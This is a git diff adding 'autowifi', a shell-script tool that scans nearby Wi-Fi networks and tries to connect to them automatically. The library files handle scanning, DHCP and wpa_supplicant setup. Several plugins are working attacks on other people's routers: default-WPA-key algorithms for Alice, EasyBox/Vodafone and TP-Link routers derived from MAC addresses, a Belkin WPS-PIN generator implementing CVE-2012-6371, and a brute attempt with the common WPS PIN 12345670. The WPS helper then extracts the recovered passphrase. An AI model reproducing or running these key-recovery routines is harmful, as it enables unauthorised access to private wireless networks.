diff options
Diffstat (limited to 'recon/autowifi/usr/lib')
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/core | 20 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/iwlist | 55 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/network | 40 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/openwrt | 18 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/plugin_core | 41 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant | 59 | ||||
-rw-r--r-- | recon/autowifi/usr/lib/autowifi/lib/wps | 84 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/opt/udhcpc.run | 70 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/00profile | 11 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/01open | 6 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02alice | 20 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02easybox | 37 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/02tplink | 17 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps | 40 | ||||
-rwxr-xr-x | recon/autowifi/usr/lib/autowifi/plugins/30default_wps | 18 |
15 files changed, 536 insertions, 0 deletions
diff --git a/recon/autowifi/usr/lib/autowifi/lib/core b/recon/autowifi/usr/lib/autowifi/lib/core new file mode 100644 index 00000000..80ae75b4 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/core @@ -0,0 +1,20 @@ +#!/bin/sh + +exists() { type "$1" >/dev/null 2>/dev/null; } + +run_hooks(){ + # (interface|profile) (pre|post) + typ=$1 + action=$2 + shift;shift + : ${interface?please provide interface} + if [ "$typ" = "interface" ];then + path=interface/$interface/$action + else + path=profile/$2/$action + fi + for hook in $(find "$root/etc/autowifi/hooks/$path" -type f 2>/dev/null | sort -u ); do + $hook "$@" + done +} + diff --git a/recon/autowifi/usr/lib/autowifi/lib/iwlist b/recon/autowifi/usr/lib/autowifi/lib/iwlist new file mode 100644 index 00000000..a9f77f0c --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/iwlist @@ -0,0 +1,55 @@ +#!/bin/sh + +print_iwlist_env(){ + # takes environment: + # count + # MAC + # CHANNEL + # QUALITY + # ENCRYPTION + # ESSID + # WPA + # WPA2 + for i in ESSID MAC CHANNEL QUALITY ENCRYPTION WPA WPA2;do + eval echo ${i}_${count}=\$${i} + done +} + +iwlist_scan(){ + # usage: iwlist_scan $wifi-itf + ifconfig $wifi up + + count=0 + + iwlist ${1:-} scan 2>/dev/null | ( while read line; + do + case "$line" in + *"Cell "*) + [ $count -eq 0 ] || print_iwlist_env + WPA=0 + WPA2=0 + : $((count+=1)) + MAC="${line#*Address: }" + ;; + *Channel:*) + CHANNEL="${line#*:}" + ;; + *Quality=*) + QUALITY="`printf '%s' ${line#*Quality=} | cut -d/ -f 1`" + ;; + *"Encryption key:"*) + ENCRYPTION="${line#*key:}" + ;; + *ESSID:*) + ESSID="${line#*ESSID:}" + ;; + *"IE: IEEE 802.11i/WPA2"*) + WPA2=1 + ;; + *"IE: WPA Version 1"*) + WPA=1 + ;; + *);; + esac + done; print_iwlist_env ;echo WIFI_COUNT=$count) +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/network b/recon/autowifi/usr/lib/autowifi/lib/network new file mode 100644 index 00000000..a0105120 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/network @@ -0,0 +1,40 @@ +#!/bin/sh + +check_gateway(){ + ping -c 1 -w 5 $(ip route | awk '/default/{print $3}') >/dev/null +} +check_internet(){ + # TODO determine the loader, either wget or curl + secret=$(wget -O- http://krebsco.de/secret 2>/dev/null) + if [ "$secret" == "1337" ]; then + return 0 + else + echo "cannot load secret or secret incorrect" >&2 + return 1 + fi +} + +check_bandwidth(){ + echo $(curl http://www.microsoft.com/africa/4afrika/images/infographic.gif -w "%{speed_download}" -o /dev/null 2>/dev/null | sed 's/\..*//') +} + +ip_start(){ + : ${interface?interface variable not set} ${1?please provide method to start ip} + # usage: method [extra parms] + case "$1" in + dhcp) + if exists dhcpcd; then + dhcpcd -x $interface + dhcpcd -w -A $interface + elif exists dhclient; then + dhclient -x $interface + dhclient $interface + elif exists udhcpc; then + PIDFILE=/var/run/udhcpc-${interface}.pid + [ -e $PIDFILE ] && kill `cat $PIDFILE` ||: + udhcpc -n -p $PIDFILE -i $interface -s \ + "$root/usr/lib/autowifi/opt/udhcpc.run" + fi ;; + *) echo "do not know ip starter $1" >&2;; + esac +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/openwrt b/recon/autowifi/usr/lib/autowifi/lib/openwrt new file mode 100644 index 00000000..3483c1fe --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/openwrt @@ -0,0 +1,18 @@ +#!/bin/sh +connect_wifi(){ + # channel ssid encryption key + uci set wireless.${iface}.mode=sta + + ifconfig $wifi up + uci set wireless.${radio}.channel=$1 + uci set "wireless.${iface}.ssid=$2" + if [ $3 == "none" ] ; then + uci set wireless.${iface}.encryption=none + uci -q delete wireless.${iface}.key + else + uci set "wireless.${iface}.key=$4" + uci set wireless.${iface}.encryption=$3 + fi + uci commit wireless + wifi up +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/plugin_core b/recon/autowifi/usr/lib/autowifi/lib/plugin_core new file mode 100644 index 00000000..e79a3c05 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/plugin_core @@ -0,0 +1,41 @@ +#!/bin/sh +parse_plugin_args(){ + [ $# -ne 4 ] && plugin_usage && exit 1 + # convenience function to put args in ENV variables + ESSID="$1" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} + CHANNEL="$3" + ENC="$4" + if [ ${#MAC} -ne 12 ] ;then + echo "MAC malformed" + exit 1 + fi +} +plugin_usage(){ + cat << EOF +usage: $0 ESSID MAC CHANNEL ENC" + + ESSID - string + MAC - 00:11:22:33:44:55 + CHANNEL - 4 + ENC - wpa +EOF + +} + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} +check_painmode(){ + test -z "${painmode:-}" && echo "painmode required" && exit 1 +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant b/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant new file mode 100644 index 00000000..df9c2155 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/wpa_supplicant @@ -0,0 +1,59 @@ +#!/bin/sh +start_wpa_supplicant(){ + wpa_conf=${1?please supply wpa_supplicant.conf path} + killall wpa_supplicant + sleep 1 +cat>$wpa_conf<<EOF +ctrl_interface=/var/run/wpa_supplicant +EOF + wpa_supplicant -i $interface -c $wpa_conf -B + sleep 4 +} +connect_wifi(){ + # bssid ssid encryption-string key + + wpa_cli reconfigure + + int=$(wpa_cli add_network | tail -1) + wpa_cli set_network $int ssid \"$2\" + wpa_cli set_network $int bssid $1 + #wpa_cli set_network $int ap_scan 1 + + if [ "$3" = "[ESS]" ]; then + wpa_cli set_network $int key_mgmt NONE + else + wpa_cli set_network $int key_mgmt WPA-PSK + wpa_cli set_network $int psk \"$4\" + fi + wpa_cli enable_network $int +} + +wifi_scan(){ + # usage: iwlist_scan $wifi-itf + + count=0 + wpa_cli scan >/dev/null + sleep 10 + + wpa_cli scan_results 2>/dev/null | egrep "^..:" | sed 's/ / /g' | (while IFS=' ' read MAC FREQ QUALITY ENCRYPTION ESSID + do + : $((count+=1)) + print_wifi_env + + done; echo WIFI_COUNT=$count) +} + +print_wifi_env(){ + # takes environment: + # MAC + # FREQ + # QUALITY + # ENCRYPTION + # ESSID + for i in MAC FREQ QUALITY ENCRYPTION ESSID;do + eval echo ${i}_${count}=\\\"\$"${i}"\\\" + done +} +wpa_supplicant_is_usable(){ + wpa_cli status >/dev/null 2>&1 +} diff --git a/recon/autowifi/usr/lib/autowifi/lib/wps b/recon/autowifi/usr/lib/autowifi/lib/wps new file mode 100644 index 00000000..5e9bbda7 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/lib/wps @@ -0,0 +1,84 @@ +#!/bin/sh +has_wps(){ + # the-wpa_supplicant-encryption-string + echo "$1" | grep -q "\[WPS\]" +} +try_wps_pin(){ + # + # ESSID MAC CHANNEL ENC WPA WPA2 PIN + #set -ef + ESSID="$1" + MAC="$2" + CHANNEL="$3" + + # TODO refactor to use all the encryption + # the wpa_supplicant encryption string + ENC="$4" + + PIN="$5" + + [ "$ENC" == "[ESS]" ] && return 2 + WPA_CONF=/tmp/wpa_trywps.conf + WPA_LOG=/tmp/wpa_trywps.log + rm $WPA_LOG + #mkfifo $WPA_LOG + killall wpa_supplicant 2>/dev/null && sleep 1 + + cat > $WPA_CONF <<EOF +ctrl_interface=/var/run/wpa_supplicant +ctrl_interface_group=0 +update_config=1 +EOF + wpa_supplicant -Dwext -iwlan0 -c $WPA_CONF -f $WPA_LOG 2>&1 & + WPA_PID=$! + sleep 2 + if !(sudo wpa_cli wps_reg $MAC $PIN | grep -q OK) ;then + echo "wpa_cli wps_reg failed, bailing out!" + return 1 + fi + + # association failed + # exit 1 ;; + # TODO probably not posix compatible... + timeout(){ + ( timeout=10; + while [ $timeout -gt 0 ]; do + sleep 1; + kill -0 $$ 2> /dev/null || exit 0; + : $((timeout--)); + done ; + echo "TIMEOUT REACHED" ; + kill $$)& + exec $@ + } + + if ( timeout tail -f $WPA_LOG & echo "TAILPID: $!") | while read line ; do + bye(){ + printf "%s:" "$2" >&2 + kill $WPA_PID + kill -HUP $TAILPID + exit $1 + } + # DEBUG + #echo $line >&2 + case "$line" in + TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; + *"WPS-FAIL msg=10 config_error=18"*) bye 1 "wrong pin";; + *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1 "rate limiting";; + #*"Association request to the driver failed") bye 1 "wps not available";; + #*CTRL-EVENT-DISCONNECTED*):;; + *"CTRL-EVENT-DISCONNECTED bssid="*"reason=3 locally_generated=1"*)bye 1 "authentication failed, wps deactivated?";; + "TIMEOUT REACHED")bye 1 "timeout reached";; + *CTRL-EVENT-TERMINATING*) bye 1 "wpa_supplicant died";; + *CTRL-EVENT-CONNECTED*) bye 0 "yay connected";; + esac + done ; then + #echo "Connected!" + sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' "$WPA_CONF" + return 0 + else + #echo "failed!" + return 1 + fi + +} diff --git a/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run b/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run new file mode 100755 index 00000000..2e1b919f --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/opt/udhcpc.run @@ -0,0 +1,70 @@ +#!/bin/sh +# shamelessly stolen from http://www.doit.org/udhcpc/S50default + +PATH=/bin:/usr/bin:/sbin:/usr/sbin + +RESOLV_CONF="/etc/resolv.conf" + +update_interface() +{ + [ -n "$broadcast" ] && BROADCAST="broadcast $broadcast" + [ -n "$subnet" ] && NETMASK="netmask $subnet" + ifconfig $interface $ip $BROADCAST $NETMASK +} + +update_routes() +{ + if [ -n "$router" ] + then + echo "deleting routes" + while route del default gw 0.0.0.0 dev $interface + do : + done + + for i in $router + do + route add default gw $i dev $interface + done + fi +} + +update_dns() +{ + echo -n > $RESOLV_CONF + [ -n "$domain" ] && echo domain $domain >> $RESOLV_CONF + for i in $dns + do + echo adding dns $i + echo nameserver $i >> $RESOLV_CONF + done +} + +deconfig() +{ + ifconfig $interface 0.0.0.0 +} + +case "$1" in + bound) + update_interface; + update_routes; + update_dns; + ;; + + renew) + update_interface; + update_routes; + update_dns; + ;; + + deconfig) + deconfig; + ;; + + *) + echo "Usage: $0 {bound|renew|deconfig}" + exit 1 + ;; +esac + +exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/00profile b/recon/autowifi/usr/lib/autowifi/plugins/00profile new file mode 100755 index 00000000..d7fb9c75 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/00profile @@ -0,0 +1,11 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 +# ENV: +# root (default: /) +root=${root:-/} +cat $root/etc/autowifi/wifi_keys 2>/dev/null | (while IFS='|' read SSID MAC BANDWIDTH KEY; do + if [ "$1" == "$SSID" -a "$2" == "$MAC" ]; then + echo $KEY + exit 0 + fi +done; exit 1) diff --git a/recon/autowifi/usr/lib/autowifi/plugins/01open b/recon/autowifi/usr/lib/autowifi/plugins/01open new file mode 100755 index 00000000..881f47ea --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/01open @@ -0,0 +1,6 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION +if [ "$4" == "[ESS]" ]; then + exit 0 +fi +exit 1 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02alice b/recon/autowifi/usr/lib/autowifi/plugins/02alice new file mode 100755 index 00000000..1b4533a4 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02easybox b/recon/autowifi/usr/lib/autowifi/plugins/02easybox new file mode 100755 index 00000000..3d7cb8c1 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/02easybox @@ -0,0 +1,37 @@ +#!/bin/sh +#ESSID MAC CHANNEL ENCRYPTION WPA WPA2 + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core +parse_plugin_args "$@" + +if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then + echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" + exit 1 +else + + # Fill up to 4 places with zeros, if necessary: + deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') + # + # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: + hexi=$(echo ${MAC:8:4} | sed 's/./& /g') + #echo 'M4 (Hex): ' ${hexi[@]} + # K1 = last byte of (d0 + d1 + h2 + h3) + # K2 = last byte of (h0 + h1 + d2 + d3) + c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1}) + c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1}) + K1=$((($c1)%16)) + K2=$((($c2)%16)) + #printf "K1: %x\n" $K1 + #printf "K2: %x\n" $K2 + X1=$((K1^${deci:6:1})) + X2=$((K1^${deci:4:1})) + X3=$((K1^${deci:2:1})) + Y1=$((K2^0x${hexi:2:1})) + Y2=$((K2^0x${hexi:4:1})) + Y3=$((K2^0x${hexi:6:1})) + Z1=$((0x${hexi:4:1}^${deci:6:1})) + Z2=$((0x${hexi:6:1}^${deci:4:1})) + Z3=$((K1^K2)) + printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F +fi diff --git a/recon/autowifi/usr/lib/autowifi/plugins/02tplink b/recon/autowifi/usr/lib/autowifi/plugins/02tplink new file mode 100755 index 00000000..b2b96f95 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/02tplink @@ -0,0 +1,17 @@ +#!/bin/sh +# Implementation of TP-Link default WPA Key +# Based on +# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1 +! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1 + + +# printf always makes string to lower, need that for correct md5sum +printf ${MAC:4:12} +exit 0 diff --git a/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps b/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps new file mode 100755 index 00000000..d4eb8e37 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/11belkin_wps @@ -0,0 +1,40 @@ +#!/bin/sh +# thanks to http://ednolo.alumnos.upv.es/?p=1295G +# for the PoC code +# Calculates the default WPS pin of Belkin Routers and returns the WPA key +# +# Implementation of CVE-2012-6371 + +# works : +# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000 +# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000 +# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000 + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core +. ../lib/wps +parse_plugin_args "$@" + +check_painmode + +! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 + +calc_belkin(){ + PRIVATE_MAC=${1} + + p=$((0x$PRIVATE_MAC % 10000000)) + wps_pin_checksum(){ + pin=$1 + accum=0 + while [ $pin -ne 0 ];do + accum=$((accum + (3 * (pin % 10)) )) + pin=$((pin/10)) + accum=$((accum + pin %10 )) + pin=$((pin/10)) + done + echo $(( (10 - accum % 10) % 10)) + } + printf "%07d%d" $p $(wps_pin_checksum $p) + return 0 +} +try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC}) diff --git a/recon/autowifi/usr/lib/autowifi/plugins/30default_wps b/recon/autowifi/usr/lib/autowifi/plugins/30default_wps new file mode 100755 index 00000000..50ad2676 --- /dev/null +++ b/recon/autowifi/usr/lib/autowifi/plugins/30default_wps @@ -0,0 +1,18 @@ +#!/bin/sh +# on MANY WPS-enabled devices the pin is 12345670 , so we can give it a shot +# http://www.wotan.cc/?p=75 +cd $(dirname $(readlink -f $0)) +. ../lib/wps +. ../lib/plugin_core + +parse_plugin_args "$@" +check_painmode +DEFAULT_PIN="${DEFAULT_PIN:-12345670}" + +if has_wps "$ENC"; then + echo "trying PIN $DEFAULT_PIN against $ESSID" >&2 + try_wps_pin "$@" $DEFAULT_PIN +else + echo "Network $ESSID not WPS enabled" + exit 1 +fi |